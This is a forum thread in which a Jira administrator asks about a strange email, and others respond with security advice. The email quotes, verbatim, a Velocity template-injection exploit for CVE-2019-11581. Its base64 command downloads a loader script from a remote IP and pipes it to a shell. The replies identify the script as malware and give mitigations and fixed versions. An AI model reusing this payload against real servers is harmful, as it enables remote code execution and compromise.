Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
Products
See all
Community resources
Interests
See all
Community resources
Top groups
Explore all groups
Community resources

It's not the same without you

Join the community to find out what other Atlassian users are discussing, debating and creating.

Sign up for free Log in
Atlassian Community Hero Image Collage

got Weird Email from our JIRA application

Michael
Michael Mar 26, 2021

Hi,

 

       Please someone help me advise why we got weird email from our JIRA application. Our JIRA application version is (v6.0.2#6097-sha1:e270beb). Below are email message from our JIRA application.

 

[JIRA] #set ($cmd="bash -c {echo,c2ggLWMgIihjdXJsIC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSBodHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNofHx3Z2V0IC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSAtcSAtTyAtIGh0dHA6Ly8xOTQuMTQ1LjIyNy4yMS9sZHIuc2gpfHNoIg==}|{base64,-d}|{bash,-i}") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end

 

Thanks,

Michael

Answer
Watch
Like Be the first to like this
150 views

4 answers

2 votes
Daniel Eads
Daniel Eads Atlassian Team Apr 01, 2021

Hi Michael,

I've looked through the command this string is attempting to execute, and believe the file it tries to download and run is a malware loader. I would advise taking these steps:

  1. Disable the "contact administrators" form in your Jira instance:
    1. Choose the  Administration () System.
    2. Choose General Configuration.
    3. Click Edit Settings.
    4. Scroll down to the Contact Administrators Form and set it to OFF.
    5. Click Update.
  2. Block the following URLs from being accessed by the internet, if you have a reverse proxy in front of your Jira instance:
    1. /secure/ContactAdministrators
    2. /secure/admin/SendBulkMail!default.jspa
    3. /admin/SendBulkMail!default.jspa
    4. /SendBulkMail!default.jspa
  3. Scan your server for malware
    1. The loader file in your question attempts to move the executable for iptables from /sbin/iptables to /sbin/iptables_  - I would consider the presence of that renamed executable to be proof that the loader script had run and that the server is likely compromised.
  4. Upgrade Jira to a recent version - any version released after July 10, 2019 should contain the fix for this CVE, as described in the security advisory for CVE-2019-11581 . Since you are currently on Jira 6.0, you will need to make at least one intermediary upgrade to 7.0 before continuing up to a more recent version of Jira. I would suggest the following upgrade path:
    1. 6.0 (your current version) -> 6.4 -> 7.0 -> 7.6.17 (the last release in 7.6 - which contains the fix for the CVE)
    2. See Upgrading Jira applications for more upgrade information
  5. At this point, I would suggest either considering a Cloud migration - our cloud migration assistant app supports Jira 7.6 and newer - or continue upgrading to a more recent version of Jira Server such as Jira 8.13.
Reply
0 votes
Michael
Michael May 10, 2021

Anyone can help for my issue?

Reply
0 votes
Bastien Lespinasse
Bastien Lespinasse Apr 01, 2021

Hello Michael,

 

We received the exact same emails not long ago. We decided to open a ticket on Atlassian support. We believe it is related to https://confluence.atlassian.com/adminjiraserver/jira-security-advisory-2019-07-10-1047539912.html and https://community.atlassian.com/t5/Jira-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241 but we are not sure.

 

Best regards,

Bastien.

View More Comments
Ramith Dilshan
Ramith Dilshan Apr 20, 2021

Hi Bastien

Could you get a solution for this weird mail ?

Like
Bastien Lespinasse
Bastien Lespinasse May 19, 2021

Hello Ramith,

 

Atlassian confirmed that if your Jira has been upgraded to a fixed version, this is not a problem.

List of fixed versions:

  • 7.6.14
  • 7.13.5
  • 8.0.3
  • 8.1.2
  • 8.2.3
  • All versions higher than 8.3

Therefore, we were protected but we were definitely under attack.

Like
Reply
0 votes
Michael
Michael Mar 31, 2021

Hi Anyone can help me for this issue?

Reply

Suggest an answer

Log in or Sign up to answer
Jira
Jira
TAGS

Community Events

Connect with like-minded Atlassian users at free events near you!

Find an event

Connect with like-minded Atlassian users at free events near you!

Unfortunately there are no Community Events near you at the moment.

Host an event

You're one step closer to meeting fellow Atlassian users at your local event. Learn more about Community Events

Events near you